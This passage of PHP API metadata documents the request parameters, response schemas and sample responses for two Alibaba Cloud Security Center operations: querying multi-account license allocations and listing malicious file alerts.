=> 'object', 'properties' => [ 'Count' => ['description' => 'Number of malicious file detection SDK authorizations allocated.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Number of malicious file detection SDK authorizations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'VersionSummary' => [ 'description' => 'Authorization usage statistics for the member account.', 'type' => 'array', 'items' => [ 'description' => 'Authorization usage statistics for the member account.', 'type' => 'object', 'properties' => [ 'Version' => ['description' => 'Version of the Cloud Security Center for the member account. Values:'."\n" ."\n" .'- **1**: Free Edition'."\n" ."\n" .'- **3**: Enterprise Edition'."\n" ."\n" .'- **5**: Advanced Edition'."\n" ."\n" .'- **6**: Anti-Virus Edition'."\n" ."\n" .'- **7**: Flagship Edition'."\n" ."\n" .'- **8**: Multiple Versions'."\n" ."\n" .'- **10**: Value-Added Services Only', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'EcsCount' => [ 'description' => 'Usage details of ECS authorizations for the member account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Number of ECS authorizations allocated.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Number of ECS authorizations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Assigned' => ['description' => 'Number of purchased licenses allocated.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CoreCount' => [ 'description' => 'Usage of core authorization for the member account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated number of cores.', 'type' => 'integer', 'format' => 'int64', 'example' => '4', 'title' => ''], 'Used' => ['description' => 'Number of cores used.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Assigned' => ['description' => 'Assigned number of cores.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AuthBindType' => ['description' => 'Authorization type consumed during binding, with values:'."\n" ."\n" .'- **ASSET**:Consumes the number of authorized instances'."\n" ."\n" .'- **CORE**:Consumes the number of authorized cores'."\n" ."\n" .'- **ASSET\\_AND\\_CORE**:Consumes both the number of authorized instances and cores.', 'type' => 'string', 'example' => 'ASSET_AND_CORE', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'UserType' => ['description' => 'User type. Values:'."\n" ."\n" .'- **Administrator User**:1'."\n" ."\n" .'- **Regular User**:2', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of items to return per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'Total number of items.', 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], 'MaxResults' => ['description' => 'The number of items to return in each batch query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1000', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned when using the NextToken method.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'DaInstance' => [ 'description' => 'Details of the administrator account.', 'type' => 'object', 'properties' => [ 'AliUid' => ['description' => 'AliUid of the administrator account.', 'type' => 'integer', 'format' => 'int64', 'example' => '1766185894104675', 'title' => ''], 'InstanceId' => ['description' => 'Cloud Security Center instance ID purchased by the administrator account.', 'type' => 'string', 'example' => 'i-bp1gmm4pnacse343nqal', 'title' => ''], 'InstancePurchaseType' => ['description' => 'Instance purchase type. Values:'."\n" ."\n" .'- **0**:Self-purchased.'."\n" ."\n" .'- **1**:Allocated.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Version' => ['description' => 'Purchased version of Cloud Security Center. Values:'."\n" ."\n" .'- **1**:Free Edition'."\n" ."\n" .'- **3**:Enterprise Edition'."\n" ."\n" .'- **5**:Advanced Edition'."\n" ."\n" .'- **6**:Anti-Virus Edition'."\n" ."\n" .'- **7**:Flagship Edition'."\n" ."\n" .'- **8**:Multiple Editions'."\n" ."\n" .'- **10**:Value-Added Services Only', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Status' => ['description' => 'Administrator account instance status. Values:'."\n" ."\n" .'- **1**: Active.'."\n" ."\n" .'- **2**: Inactive.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SlsCapacity' => [ 'description' => 'Usage and allocation of administrator account log storage capacity.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Administrator account log storage capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '150', 'title' => ''], 'Used' => ['description' => 'Used log storage capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '5', 'title' => ''], 'Assigned' => ['description' => 'Allocated log storage capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AntiRansomwareCapacity' => [ 'description' => 'Usage and allocation of administrator account anti-ransomware capacity.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Administrator account anti-ransomware capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '14', 'title' => ''], 'Used' => ['description' => 'Used anti-ransomware capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'Assigned' => ['description' => 'Allocated anti-ransomware capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RaspCapacity' => [ 'description' => 'Usage and allocation of administrator account RASP (Runtime Application Self-Protection) capacity.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased RASP capacity. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '7', 'title' => ''], 'Used' => ['description' => 'Used RASP capacity. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '6', 'title' => ''], 'Assigned' => ['description' => 'Allocated RASP capacity. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CspmCapacity' => [ 'description' => 'Usage and allocation of administrator account CSPM (Cloud Security Posture Management) scan count.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased CSPM scan count. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '180000', 'title' => ''], 'Used' => ['description' => 'Used CSPM scan count. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '31569', 'title' => ''], 'Assigned' => ['description' => 'Allocated CSPM scan count. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ThreatAnalysisCapacity' => [ 'description' => 'Usage and allocation of administrator account threat analysis capacity.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased threat analysis capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '3000', 'title' => ''], 'Used' => ['description' => 'Used threat analysis capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '1548', 'title' => ''], 'Assigned' => ['description' => 'Assigned threat analysis capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ThreatAnalysisFlow' => [ 'description' => 'Usage and allocation of threat analysis and response log inbound traffic for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased threat analysis and response log inbound traffic. Unit: GB/day.', 'type' => 'integer', 'format' => 'int64', 'example' => '300', 'title' => ''], 'Used' => ['description' => 'Used threat analysis and response log inbound traffic. Unit: GB/day.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Assigned' => ['description' => 'Assigned threat analysis and response log inbound traffic. Unit: GB/day.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ImageScanCapacity' => [ 'description' => 'Usage and allocation of image scan authorization count for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased image scan authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '60', 'title' => ''], 'Used' => ['description' => 'Used purchased image scan authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Assigned' => ['description' => 'Assigned image scan authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'WebLockCapacity' => [ 'description' => 'Usage and allocation of web lock (anti-tampering) authorization count for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased web lock (anti-tampering) authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '5', 'title' => ''], 'Used' => ['description' => 'Used web lock (anti-tampering) authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'Assigned' => ['description' => 'Assigned web lock (anti-tampering) authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'HoneypotCapacity' => [ 'description' => 'Usage and allocation of honeypot authorization count for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased honeypot authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '45', 'title' => ''], 'Used' => ['description' => 'Used honeypot authorization count.', 'type' => 'integer', 'format' => 'int64', 'example' => '9', 'title' => ''], 'Assigned' => ['description' => 'Assigned number of honeypot licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'SdkCapacity' => [ 'description' => 'Usage and allocation details of the malicious file detection SDK licenses for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased number of malicious file detection SDK licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '50', 'title' => ''], 'Used' => ['description' => 'Used number of malicious file detection SDK licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Assigned' => ['description' => 'Assigned number of malicious file detection SDK licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'VersionSummary' => [ 'description' => 'Authorization usage statistics for the administrator account.', 'type' => 'array', 'items' => [ 'description' => 'Authorization usage statistics for the administrator account.', 'type' => 'object', 'properties' => [ 'Version' => ['description' => 'Purchased version of Cloud Security Center. Values:'."\n" ."\n" .'- **1**: Free Edition'."\n" ."\n" .'- **3**: Enterprise Edition'."\n" ."\n" .'- **5**: Advanced Edition'."\n" ."\n" .'- **6**: Antivirus Edition'."\n" ."\n" .'- **7**: Flagship Edition'."\n" ."\n" .'- **8**: Multiple Editions'."\n" ."\n" .'- **10**: Only Value-Added Services Purchased', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'EcsCount' => [ 'description' => 'Usage and allocation details of the ECS instance licenses for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased number of ECS instance licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'Used' => ['description' => 'Used number of purchased ECS instance licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '14', 'title' => ''], 'Assigned' => ['description' => 'Assigned number of purchased ECS instance licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CoreCount' => [ 'description' => 'Usage and allocation details of the core licenses for the administrator account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Purchased number of core licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '150', 'title' => ''], 'Used' => ['description' => 'Used number of core licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '68', 'title' => ''], 'Assigned' => ['description' => 'Assigned number of core licenses.', 'type' => 'integer', 'format' => 'int64', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AuthBindType' => ['description' => 'The type of authorization consumed during binding. Values:'."\n" ."\n" .'- ASSET: consumes the number of authorized instances'."\n" ."\n" .'- CORE: consumes the number of authorized cores'."\n" ."\n" .'- ASSET\\_AND\\_CORE: consumes both the number of authorized instances and cores', 'type' => 'string', 'example' => 'ASSET_AND_CORE', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'UserType' => ['description' => 'User type. Values:'."\n" ."\n" .'- **Administrator User**: 1'."\n" ."\n" .'- **Regular User**: 2', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"88F2A6CD-E500-5038-B992-0107B99AA88C\\",\\n \\"SaleInstanceList\\": [\\n {\\n \\"AliUid\\": 103784262032,\\n \\"InstanceId\\": \\"api-service-spec\\",\\n \\"InstancePurchaseType\\": 1,\\n \\"Version\\": 3,\\n \\"Status\\": 1,\\n \\"SlsCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"AntiRansomwareCapacity\\": {\\n \\"Count\\": 10,\\n \\"Used\\": 0\\n },\\n \\"RaspCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"CspmCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"ThreatAnalysisCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"ThreatAnalysisFlow\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"ImageScanCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"WebLockCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"HoneypotCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"SdkCapacity\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0\\n },\\n \\"VersionSummary\\": [\\n {\\n \\"Version\\": 5,\\n \\"EcsCount\\": {\\n \\"Count\\": 0,\\n \\"Used\\": 0,\\n \\"Assigned\\": 0\\n },\\n \\"CoreCount\\": {\\n \\"Count\\": 4,\\n \\"Used\\": 0,\\n \\"Assigned\\": 0\\n },\\n \\"AuthBindType\\": \\"ASSET_AND_CORE\\"\\n }\\n ],\\n \\"UserType\\": 2\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55,\\n \\"MaxResults\\": 1000,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"DaInstance\\": {\\n \\"AliUid\\": 1766185894104675,\\n \\"InstanceId\\": \\"i-bp1gmm4pnacse343nqal\\",\\n \\"InstancePurchaseType\\": 0,\\n \\"Version\\": 3,\\n \\"Status\\": 1,\\n \\"SlsCapacity\\": {\\n \\"Count\\": 150,\\n \\"Used\\": 5,\\n \\"Assigned\\": 10\\n },\\n \\"AntiRansomwareCapacity\\": {\\n \\"Count\\": 14,\\n \\"Used\\": 2,\\n \\"Assigned\\": 0\\n },\\n \\"RaspCapacity\\": {\\n \\"Count\\": 7,\\n \\"Used\\": 6,\\n \\"Assigned\\": 0\\n },\\n \\"CspmCapacity\\": {\\n \\"Count\\": 180000,\\n \\"Used\\": 31569,\\n \\"Assigned\\": 0\\n },\\n \\"ThreatAnalysisCapacity\\": {\\n \\"Count\\": 3000,\\n \\"Used\\": 1548,\\n \\"Assigned\\": 0\\n },\\n \\"ThreatAnalysisFlow\\": {\\n \\"Count\\": 300,\\n \\"Used\\": 0,\\n \\"Assigned\\": 0\\n },\\n \\"ImageScanCapacity\\": {\\n \\"Count\\": 60,\\n \\"Used\\": 1,\\n \\"Assigned\\": 0\\n },\\n \\"WebLockCapacity\\": {\\n \\"Count\\": 5,\\n \\"Used\\": 3,\\n \\"Assigned\\": 0\\n },\\n \\"HoneypotCapacity\\": {\\n \\"Count\\": 45,\\n \\"Used\\": 9,\\n \\"Assigned\\": 0\\n },\\n \\"SdkCapacity\\": {\\n \\"Count\\": 50,\\n \\"Used\\": 0,\\n \\"Assigned\\": 0\\n },\\n \\"VersionSummary\\": [\\n {\\n \\"Version\\": 1,\\n \\"EcsCount\\": {\\n \\"Count\\": 20,\\n \\"Used\\": 14,\\n \\"Assigned\\": 3\\n },\\n \\"CoreCount\\": {\\n \\"Count\\": 150,\\n \\"Used\\": 68,\\n \\"Assigned\\": 4\\n },\\n \\"AuthBindType\\": \\"ASSET_AND_CORE\\"\\n }\\n ],\\n \\"UserType\\": 1\\n }\\n}","type":"json"}]', 'title' => 'Query Multi-Account Authorization Allocation List', 'description' => 'You can search for assets by conditions such as the instance ID, instance name, VPC ID, region, and public IP address of the asset. You can also search for assets that meet multiple search conditions by setting the logical relationship between different search conditions.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListMultiUserInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListMultiUserInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListObjectScanEvent' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '172800', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when you perform a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page when you perform a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: high risk'."\n" ."\n" .'- **medium**: medium risk'."\n" ."\n" .'- **low**: low risk.', 'type' => 'string', 'required' => false, 'example' => 'low', 'title' => ''], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['description' => 'The alert name.', 'type' => 'string', 'required' => false, 'example' => 'WebShell', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Valid values:'."\n" .'- **API**: API detection'."\n" .'- **OSS**: OSS detection.', 'type' => 'string', 'required' => false, 'example' => 'OSS', 'title' => ''], ], [ 'name' => 'OssKey', 'in' => 'query', 'schema' => ['description' => 'The storage key of the file in the OSS bucket.', 'type' => 'string', 'required' => false, 'example' => '1/2022/06/23/15/41/16559701077444693a0c6-33b2-4cc2-a99f-9f38b8b8****', 'title' => ''], ], [ 'name' => 'BucketName', 'in' => 'query', 'schema' => ['description' => 'The bucket name.', 'type' => 'string', 'required' => false, 'example' => 'ltrbuck****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Md5', 'in' => 'query', 'schema' => ['description' => 'The MD5 hash of the file.', 'type' => 'string', 'required' => false, 'example' => '0552c44e243abdea1729d4507bce****', 'title' => ''], ], [ 'name' => 'TimeStart', 'in' => 'query', 'schema' => ['description' => 'The start time of the time range during which the exception event occurred.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1683603086000', 'title' => ''], ], [ 'name' => 'TimeEnd', 'in' => 'query', 'schema' => ['description' => 'The end time of the time range during which the exception event occurred.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1683862286000', 'title' => ''], ], [ 'name' => 'ParentEventId', 'in' => 'query', 'schema' => ['description' => 'If the file is a sub-file within a compressed archive, **ParentEventId** specifies the event ID of the alert for the compressed archive itself.'."\n" ."\n" .'To retrieve and query alert events for sub-files within a compressed archive:'."\n" ."\n" .'1. Call this operation and check the **HasSubEvent** response parameter. If the value is **true**, the corresponding **EventId** is the event ID of the alert for the compressed archive itself.'."\n" .'2. Call this operation again and pass the **EventId** value to **ParentEventId** to view the alert events for the sub-files within the compressed archive.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The event status. Valid values:'."\n" ."\n" .'- 0: unhandled '."\n" .'- 1: manually handled'."\n" .'- 2: whitelisted'."\n" .'- 3: ignored'."\n" .'- 4: access denied.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '8925****', 'title' => ''], ], [ 'name' => 'BatchType', 'in' => 'query', 'schema' => ['description' => 'The batch operation type. Valid values:'."\n" ."\n" .'- **sha256**: same file content'."\n" ."\n" .'- **eventName**: same alerting type.', 'type' => 'string', 'required' => false, 'example' => 'sha256', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information for the paged query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed on each page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '253', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data details.', 'type' => 'array', 'items' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'OssKey' => ['description' => 'The storage key of the file in the OSS bucket.', 'type' => 'string', 'example' => '1/2023/07/21/10/18/16899059356518bcf6c64-a04e-492d-a421-4ae8b888****', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash of the file.', 'type' => 'string', 'example' => '5b394b54ca632fe51c4ab4a6dbaf****', 'title' => ''], 'BucketName' => ['description' => 'The bucket name.', 'type' => 'string', 'example' => 'hz-new01****', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level of the scanned alert. Valid values:'."\n" ."\n" .'- **high**: high risk.'."\n" .'- **medium**: medium risk.'."\n" .'- **low**: low risk.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Source' => ['description' => 'The data source. Valid values:'."\n" .'- **API**: API detection'."\n" .'- **OSS**: OSS detection.', 'type' => 'string', 'example' => 'OSS', 'title' => ''], 'FilePath' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/usr/local****', 'title' => ''], 'EventName' => ['description' => 'The alert name.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], 'EventId' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '911273', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp when the alert first occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'LastTime' => ['description' => 'The timestamp when the alert was last detected.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Sha256' => ['description' => 'The SHA-256 hash of the file.', 'type' => 'string', 'example' => '3a6fed5fc11392b3ee9f81caf017b48640d7458766a8eb0382899a605b41****', 'title' => ''], 'Sha1' => ['description' => 'The SHA-1 hash of the file.', 'type' => 'string', 'example' => '3c01bdbb26f358bab27f267924aa2c9a03fc****', 'title' => ''], 'DisplaySandboxResult' => ['description' => 'Indicates whether cloud sandbox detection is supported. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'string', 'example' => 'true', 'title' => ''], 'Details' => [ 'description' => 'The detailed information of the check item.', 'type' => 'array', 'items' => [ 'description' => 'The details.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the detail item.', 'type' => 'string', 'example' => 'DownloadUrl', 'title' => ''], 'NameDisplay' => ['description' => 'The display name of the alert event.', 'type' => 'string', 'example' => 'DownloadUrl', 'title' => ''], 'Type' => ['description' => 'The type of the detail information.', 'type' => 'string', 'example' => 'html', 'title' => ''], 'Value' => ['description' => 'The value of the detail item.', 'type' => 'string', 'example' => 'http://gcx.cn-hangzhou.aliyuncs.com/****', 'title' => ''], 'ValueDisplay' => ['description' => 'The display value of the detail item.', 'type' => 'string', 'example' => 'http://gcx.cn-hangzhou.aliyuncs.com/****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'HasSubEvent' => ['description' => 'Indicates whether alerts exist for sub-files within a compressed archive. Valid values:'."\n" .'- **true**: Yes. You can obtain the corresponding **EventId** value and call this operation again with the **EventId** value passed to **ParentEventId** to view the alert events for the sub-files within the compressed archive.'."\n" .'- **false**: No.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Status' => ['description' => 'The event status. Valid values:'."\n" ."\n" .'- 0: unhandled '."\n" .'- 1: manually handled'."\n" .'- 2: whitelisted'."\n" .'- 3: ignored'."\n" .'- 4: access denied.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ErrorMsg' => ['description' => 'The error message.', 'type' => 'string', 'example' => 'connect timed out', 'title' => ''], 'OperateResult' => ['description' => 'The alert handling result.', 'type' => 'string', 'example' => 'fail', 'title' => ''], 'MatchedWhiteListRuleI18nStr' => ['description' => 'The information about the matched whitelist rule.', 'type' => 'string', 'example' => '  md5   contains   23  ', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query malicious file alerts', 'summary' => 'Queries the list of malicious file alerts.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListObjectScanEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListObjectScanEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 253\\n },\\n \\"Data\\": [\\n {\\n \\"OssKey\\": \\"1/2023/07/21/10/18/16899059356518bcf6c64-a04e-492d-a421-4ae8b888****\\",\\n \\"Md5\\": \\"5b394b54ca632fe51c4ab4a6dbaf****\\",\\n \\"BucketName\\": \\"hz-new01****\\",\\n \\"RiskLevel\\": \\"medium\\",\\n \\"Source\\": \\"OSS\\",\\n \\"FilePath\\": \\"/usr/local****\\",\\n \\"EventName\\": \\"WebShell\\",\\n \\"EventId\\": 911273,\\n \\"FirstTime\\": 1694576692000,\\n \\"LastTime\\": 1694576692000,\\n \\"Sha256\\": \\"3a6fed5fc11392b3ee9f81caf017b48640d7458766a8eb0382899a605b41****\\",\\n \\"Sha1\\": \\"3c01bdbb26f358bab27f267924aa2c9a03fc****\\",\\n \\"DisplaySandboxResult\\": \\"true\\",\\n \\"Details\\": [\\n {\\n \\"Name\\": \\"DownloadUrl\\",\\n \\"NameDisplay\\": \\"DownloadUrl\\",\\n \\"Type\\": \\"html\\",\\n \\"Value\\": \\"http://gcx.cn-hangzhou.aliyuncs.com/****\\",\\n \\"ValueDisplay\\": \\"http://gcx.cn-hangzhou.aliyuncs.com/****\\"\\n }\\n ],\\n \\"HasSubEvent\\": true,\\n \\"Status\\": 0,\\n \\"ErrorMsg\\": \\"connect timed out\\",\\n \\"OperateResult\\": \\"fail\\",\\n \\"MatchedWhiteListRuleI18nStr\\": \\"  md5   contains   23  \\",\\n \\"Remark\\": \\"test\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListOpaClusterStrategyNew' => [ 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 